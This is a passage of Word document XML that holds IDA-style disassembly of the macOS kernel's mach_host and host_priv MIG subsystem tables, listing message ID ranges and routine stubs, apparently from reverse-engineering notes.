          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mach_host_subsystem()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 public mach_host_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8 ; const mach_host_subsystem mach_host_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8 mach_host_subsystem_0 dq offset mach_host_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                                         ; DATA XREF: mach_host_server_routine:loc_FFFFFF80003A1962o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                                         ; mach_host_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E034B8                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0C8h </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E034B8                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0E4h</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 430h                 ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq offset _Xhost_info   ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 4                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 140h                 ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E034B8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 3A1B8000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 2                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 db 34h, 2, 2 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 234h                 ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 3A1DA0h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 2                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 3400000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 3A1F40h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 7FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dq 34h                  ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E034B8                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>host_priv_subsystem()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 public host_priv_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70 ; const host_priv_subsystem host_priv_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70 host_priv_subsystem_0 dq offset host_priv_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                                         ; DATA XREF: host_priv_server_routine:loc_FFFFFF800039A9B2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                                         ; host_priv_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 190h</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E02E70                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">1AAh  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 1034h                ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq offset _Xhost_get_boot_info; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 2                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 1034h                ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
